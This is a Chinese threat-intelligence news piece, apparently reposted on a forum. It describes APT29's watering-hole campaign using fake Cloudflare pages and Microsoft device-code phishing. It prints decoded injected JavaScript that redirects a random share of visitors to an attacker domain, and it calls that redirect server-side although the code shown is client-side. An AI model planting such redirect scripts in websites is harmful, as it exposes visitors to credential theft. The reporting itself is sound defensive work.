亚马逊(Amazon)威胁情报团队于 2025 年 8 月末发现了一场复杂的 “水坑攻击”(watering hole campaign),该攻击由代号为 APT29(又称 “午夜暴风雪”,Midnight Blizzard)的组织策划 —— 这是一个与俄罗斯对外情报局(Russian Foreign Intelligence Service)有关联的威胁行为者。
此次攻击行动通过攻陷合法网站,将毫无防备的访客重定向至恶意基础设施。
用户被重定向后,会遇到伪造的 Cloudflare 验证页面 —— 这些页面旨在窃取凭证,并诱骗受害者通过微软(Microsoft)的设备代码认证流程,授权由攻击者控制的设备。
此次攻击的规模令人震惊:约 10% 的网站访客被引流至攻击者控制的域名,例如 findcloudflare [.] com 和 cloudflare.redirectpartners [.] com。
这些域名对官方安全检查页面的模仿极为逼真,致使许多用户未能识破骗局。
(已移除域名的被攻陷页面截图(来源:亚马逊))
亚马逊分析师指出,这种攻击方式标志着 APT29 组织攻击手法的重大升级。该组织不再单纯依赖钓鱼邮件或定向鱼叉式钓鱼,而是通过向被攻陷网站中植入经过混淆处理的 JavaScript 脚本,实施 “机会性注入攻击”。
这种策略将恶意重定向直接嵌入热门网页,大幅扩大了潜在受害者范围。
访客往往在被要求输入设备代码或批准新设备授权时,才意识到自己被重定向 —— 而这些操作会让威胁行为者获得对设备的持久访问权限。
此次攻击的影响远不止凭证窃取。通过整合微软设备代码认证流程,APT29 能够在企业环境中保持持久存在,并利用已授权的会话进行横向移动和情报收集。
尽管亚马逊云服务(AWS)的系统未被攻陷,但这一事件凸显出:受国家支持的威胁行为者正不断调整攻击方法以规避传统防御,其带来的威胁持续存在。
亚马逊迅速与 Cloudflare、微软及其他服务商开展合作,摧毁了恶意域名并隔离了被攻陷的 EC2 实例 —— 这一行动充分体现了行业协同应对威胁的力量。
对植入脚本的深入分析揭示了多种高级规避技术。该 JavaScript 载荷通过 Base64 编码隐藏真实用途,同时借助随机化逻辑仅对部分访客进行重定向,以此降低被检测的概率。
脚本解码后,会执行服务器端重定向,将用户导向伪造的认证页面,同时设置 Cookie 以避免同一用户被重复重定向。以下是解码后脚本的简化版本:
(function(){
var uid = Math.random().toString(36).substring(2);
if (!document.cookie.includes('redir='+uid) && Math.random()<0.1) {
document.cookie = 'redir='+uid+';path=/';
window.location.replace('https://findcloudflare.com/device/code?auth=' + uid);
}
})();
这段代码体现了 APT29 组织的策略调整:在之前的基础设施遭到摧毁后,该组织从客户端重定向转向了服务器端重定向。
通过快速迁移至新域名并优化代码,即便其基础设施持续遭到清除,该组织仍能维持攻击行动。
亚马逊此次成功摧毁该基础设施的案例表明,对基于网页的威胁进行持续监控,并在安全社区内开展协作,具有至关重要的意义。
版权声明·<<<---红客联盟--->>>>·免责声明
1. 本版块文章内容及资料部分来源于网络,不代表本站观点,不对其真实性负责,也不构成任何建议。
2. 部分内容由网友自主投稿、编辑整理上传,本站仅提供交流平台,不为该类内容的版权负责。
3. 本版块提供的信息仅作参考,不保证信息的准确性、有效性、及时性和完整性。
4. 若您发现本版块有侵犯您知识产权的内容,请及时与我们联系,我们会尽快修改或删除。
5. 使用者违规、不可抗力(如黑客攻击)或第三方擅自转载引发的争议,联盟不承担责任。
6. 联盟可修订本声明,官网发布即生效,继续使用视为接受新条款。
联系我们:admin@chnhonker.com
